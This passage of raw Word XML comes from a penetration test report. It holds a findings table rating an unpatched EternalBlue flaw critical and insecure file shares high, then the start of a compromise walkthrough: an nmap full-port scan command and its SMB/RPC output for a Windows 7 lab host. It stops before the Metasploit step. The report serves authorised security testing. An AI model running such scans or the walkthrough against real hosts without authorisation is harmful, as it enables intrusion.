                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="2532AD24" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="503" w:right="493"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="2428FB99" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="323" w:right="312"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="10B69841" w14:textId="77777777" w:rsidR="006F587C" w:rsidRDefault="006F587C" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5DA466" w14:textId="25242D7E" w:rsidR="00BD2591" w:rsidRDefault="006F587C" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Below is a high-level overview of each finding identified during the engagement. These findings are covered in depth in the </w:t>
      </w:r>
      <w:r w:rsidRPr="006F587C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Technical Findings</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389680F" w14:textId="77777777" w:rsidR="006F587C" w:rsidRDefault="006F587C" w:rsidP="009C36F8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
      </w:pP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1E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4044"/>
        <w:gridCol w:w="1979"/>
        <w:gridCol w:w="4048"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F843E8" w14:paraId="17A08547" w14:textId="77777777" w:rsidTr="00B94616">
        <w:trPr>
          <w:trHeight w:val="315"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4044" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="76250750" w14:textId="77777777" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="23"/>
              <w:ind w:left="1629" w:right="1613"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="05967F5A" w14:textId="77777777" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="23"/>
              <w:ind w:left="304" w:right="292"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4048" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2C74B5"/>
          </w:tcPr>
          <w:p w14:paraId="79A059C3" w14:textId="77777777" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="23"/>
              <w:ind w:left="1068"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F843E8" w14:paraId="36CE8D0C" w14:textId="77777777" w:rsidTr="00B94616">
        <w:trPr>
          <w:trHeight w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10071" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BBD4EC"/>
          </w:tcPr>
          <w:p w14:paraId="0425BCF4" w14:textId="77777777" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="32"/>
              <w:ind w:left="111"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Internal</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="3"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Penetration</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="2"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F843E8" w14:paraId="4DF18B10" w14:textId="77777777" w:rsidTr="00B94616">
        <w:trPr>
          <w:trHeight w:val="544"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D05C5E0" w14:textId="77FE7631" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="272" w:lineRule="exact"/>
              <w:ind w:left="111" w:right="245"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>IPT-001:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-15"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000D36EB">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Unpatched Eternal Blue Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="5184E4E9" w14:textId="77777777" w:rsidR="00F843E8" w:rsidRDefault="00F843E8" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="2"/>
              <w:ind w:left="308" w:right="292"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4048" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="724EA3DF" w14:textId="668F636F" w:rsidR="00F843E8" w:rsidRDefault="00664CCE" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="272" w:lineRule="exact"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00664CCE">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Update Windows on the affected hosts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD4E9F" w14:paraId="71AEBCD7" w14:textId="77777777" w:rsidTr="00EA53E1">
        <w:trPr>
          <w:trHeight w:val="544"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4044" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="527D282C" w14:textId="5C4C8E6C" w:rsidR="00FD4E9F" w:rsidRDefault="00EA53E1" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="272" w:lineRule="exact"/>
              <w:ind w:left="111" w:right="245"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA53E1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>IPT-002: Insecure File Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1979" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000" w:themeFill="accent4"/>
          </w:tcPr>
          <w:p w14:paraId="267B01D8" w14:textId="4910137C" w:rsidR="00FD4E9F" w:rsidRDefault="00EA53E1" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="2"/>
              <w:ind w:left="308" w:right="292"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA53E1">
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4048" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5802777C" w14:textId="23B1563D" w:rsidR="00FD4E9F" w:rsidRPr="00664CCE" w:rsidRDefault="00EA53E1" w:rsidP="006C76DA">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="272" w:lineRule="exact"/>
              <w:ind w:left="111"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EA53E1">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Review file share privileges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58D68DBC" w14:textId="77777777" w:rsidR="00BD2591" w:rsidRDefault="00BD2591" w:rsidP="00F843E8">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="137"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E42AA02" w14:textId="77777777" w:rsidR="00BD5C4F" w:rsidRDefault="004833BA" w:rsidP="00BD5C4F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc169647985"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Machine Compromise Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1E5DF2FA" w14:textId="77777777" w:rsidR="00BD5C4F" w:rsidRDefault="00BD5C4F" w:rsidP="00BD5C4F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D1E6A0" w14:textId="704E15AF" w:rsidR="00EA741E" w:rsidRDefault="00BD5C4F" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD5C4F">
        <w:t xml:space="preserve">During the course of the </w:t>
      </w:r>
      <w:r w:rsidR="00EA741E" w:rsidRPr="00BD5C4F">
        <w:t>assessment,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C4F">
        <w:t>was able gain a foothold and compromise the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C4F">
        <w:t>, leading to</w:t>
      </w:r>
      <w:r w:rsidR="003F0C38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5C4F">
        <w:t>full administrative contro</w:t>
      </w:r>
      <w:r w:rsidR="006D01B5">
        <w:t xml:space="preserve">l. </w:t>
      </w:r>
      <w:r w:rsidR="003F0C38">
        <w:t>The steps below demonstrate the steps taken from initial access to</w:t>
      </w:r>
      <w:r w:rsidR="00613997">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F0C38">
        <w:t>compromise and does not include all vulnerabilities and misconfigurations discovered during the course of testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4646568E" w14:textId="77777777" w:rsidR="00FF76A6" w:rsidRDefault="00FF76A6" w:rsidP="008A3E5E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CE15CE" w14:textId="692ECA16" w:rsidR="005C19C0" w:rsidRDefault="00FF76A6" w:rsidP="005C19C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc169647986"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:hAnsi="Century Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="9FCB21"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Detailed Walkthrough</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2336B03A" w14:textId="77777777" w:rsidR="00F45871" w:rsidRPr="00F45871" w:rsidRDefault="00F45871" w:rsidP="00F45871"/>
    <w:p w14:paraId="284DB685" w14:textId="2CFB23C7" w:rsidR="00607540" w:rsidRPr="00F45871" w:rsidRDefault="00984E4C" w:rsidP="00607540">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F45871">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detailed reproduction step</w:t>
      </w:r>
      <w:r w:rsidR="00F45871" w:rsidRPr="00F45871">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s in compromising the machine are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2BF17F" w14:textId="77777777" w:rsidR="000F7C0B" w:rsidRDefault="000F7C0B" w:rsidP="00607540">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3182E882" w14:textId="77777777" w:rsidR="000F7C0B" w:rsidRDefault="000F7C0B" w:rsidP="00607540">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE9F8F4" w14:textId="4FB483BC" w:rsidR="000F7C0B" w:rsidRPr="00C6734A" w:rsidRDefault="00C6734A" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C6734A">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>USING METASPLO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IT (AUTOMATIC EXPLOIT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4D1DE4" w14:textId="061E9294" w:rsidR="00607540" w:rsidRPr="0092223D" w:rsidRDefault="008F398B" w:rsidP="008A3E5E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Upon connecting to the network</w:t>
      </w:r>
      <w:r w:rsidR="00BF101A" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> via VPN, </w:t>
      </w:r>
      <w:r w:rsidR="00466C1D" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the tester used nmap to scan for</w:t>
      </w:r>
      <w:r w:rsidR="009A74F0" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> open ports on the machine, which can reveal </w:t>
      </w:r>
      <w:r w:rsidR="008F097C" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>what services and applications are running</w:t>
      </w:r>
      <w:r w:rsidR="008F097C" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well as detect </w:t>
      </w:r>
      <w:r w:rsidR="008F097C" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerabilities and misconfigurations</w:t>
      </w:r>
      <w:r w:rsidR="008F097C" w:rsidRPr="0092223D">
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> set on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F543A61" w14:textId="77777777" w:rsidR="007E5185" w:rsidRPr="007E5185" w:rsidRDefault="007E5185" w:rsidP="007E5185">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFC000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E5185">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nmap -sC -sV -Pn -p- 10.10.10.40 --open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A8FE8" w14:textId="77777777" w:rsidR="008F097C" w:rsidRDefault="008F097C" w:rsidP="00607540"/>
    <w:p w14:paraId="024ACD7C"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&lt;SNIP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB9CD84"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PORT      STATE SERVICE      VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150DEEAA"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highlight w:val="darkRed"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3E4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="darkRed"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>135/tcp   open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5289B295"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highlight w:val="darkRed"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3E4D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="darkRed"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794EFFC"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highlight w:val="darkRed"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C75D47"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49152/tcp open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3652589E"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49153/tcp open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101E6790"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49154/tcp open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977C1B2"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49155/tcp open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024EC753"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49156/tcp open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23415FCB"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49157/tcp open  msrpc        Microsoft Windows RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E04C1C5"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Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378A76F0"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p>
    <w:p w14:paraId="56019CE5"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Host script results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ECD084"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xml:space="preserve">| smb2-time: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16080AD5"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date: 2024-06-14T17:11:25</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D944DAB"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|_  start_date: 2024-06-14T17:06:10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D746D1D"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xml:space="preserve">| smb2-security-mode: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068AE321"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xml:space="preserve">|   2:1:0: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19382A8E"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|_    Message signing enabled but not required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC53A97"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xml:space="preserve">| smb-security-mode: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6584C1"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account_used: guest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A2A80C"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authentication_level: user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B159639"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challenge_response: supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2630D596"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|_  message_signing: disabled (dangerous, but default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E9CE8"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|_clock-skew: mean: -26m25s, deviation: 34m36s, median: -6m27s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265639B6"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xml:space="preserve">| smb-os-discovery: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F0D541"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OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36320C29"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OS CPE: cpe:/o:microsoft:windows_7::sp1:professional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390949CD"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Computer name: haris-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34610D33"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NetBIOS computer name: HARIS-PC\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A441B32"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   Workgroup: WORKGROUP\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D41372" w14:textId="77777777" w:rsidR="00EE3E4D" w:rsidRPr="00EE3E4D" w:rsidRDefault="00EE3E4D" w:rsidP="00EE3E4D">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="293134"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="E0E2E4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE3E4D">
        <w:rPr>
